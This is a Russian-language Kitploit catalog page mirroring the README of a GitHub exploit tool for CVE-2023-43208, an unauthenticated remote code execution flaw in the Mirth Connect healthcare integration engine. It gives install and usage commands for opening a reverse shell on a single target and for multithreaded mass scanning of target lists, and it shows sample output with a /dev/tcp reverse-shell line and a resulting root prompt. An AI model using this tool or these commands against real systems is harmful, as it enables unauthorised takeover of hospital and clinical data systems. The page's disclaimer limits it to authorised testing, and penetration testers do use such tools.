Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-43208 — Эксплойт неаутентифицированного RCE для CVE-2023-43208 в Mirth Connect через XML-десериализацию, с определением версии, массовым сканированием и интерактивной PTY-оболочкой. | Kitploit
Инструменты/GitHubGitHub/4nuxd/cve-2023-43208
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHub4nuxd/cve-2023-43208

CVE-2023-43208

Эксплойт неаутентифицированного RCE для CVE-2023-43208 в Mirth Connect через XML-десериализацию, с определением версии, массовым сканированием и интерактивной PTY-оболочкой.

Репозиторий
1126 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-43208 — Mirth Connect RCE

Python CVE Platform

Эксплойт Proof-of-Concept для CVE-2023-43208 — уязвимости удаленного выполнения кода без аутентификации в Mirth Connect версий до 4.4.1.


Описание

Mirth Connect — широко используемый открытый движок интеграции здравоохранения. Данная уязвимость использует дефект десериализации Java через конечную точку /api/users с помощью специально сформированной XML-нагрузки, объединяющей гаджеты Apache Commons Collections, для достижения RCE без аутентификации. Улучшенная версия заменяет оригинальный прослушиватель pwncat на полностью независимую интерактивную PTY-оболочку, использующую только встроенные функции Python (socket, select, tty, termios). Оболочка автоматически обновляется до полноценного PTY при подключении.


Уязвимые версии

Программное обеспечениеУязвимые версииИсправленная версия
Mirth Connect< 4.4.14.4.1+

Возможности

  • Автоматическое обнаружение экземпляра Mirth Connect
  • Определение версии и проверка уязвимости
  • RCE без аутентификации через XML-нагрузку десериализации
  • Автоматическое обновление оболочки до PTY (запасные варианты: python3/python/script)
  • Корректная передача размера терминала (stty rows/cols)
  • Массовый сканер с поддержкой многопоточности
  • Вывод уязвимых целей в файл
  • Без зависимости от pwncat — только стандартная библиотека для прослушивателя

Установка

git clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt

Требования

requests
packaging
rich
alive-progress

Использование

Одиночная цель — Получение оболочки

python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>

Одиночная цель — С ngrok / привязкой порта

python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>

Массовое сканирование из файла

python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt

Аргументы

ФлагОписание
-u, --urlURL цели
-lh, --lhostВаш IP для прослушивания
-lp, --lportВаш порт для прослушивания
-bp, --bindportПереопределение порта привязки (полезно с ngrok)
-f, --fileФайл со списком целевых URL
-o, --outputСохранить уязвимые цели в файл
-t, --threadsКоличество потоков для сканирования (по умолчанию: 50)

Пример вывода

[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...

root@mirth:/# 

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования на проникновение и образовательных целей.
Несанкционированное использование против систем, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения, незаконно.
Авторы не несут ответственности за любое неправомерное использование или ущерб, причиненный данным инструментом.


Авторы

  • Авторы кода: K3ysTr0K3R и Chocapikk
  • Улучшения: 4nuxd
Скачать инструмент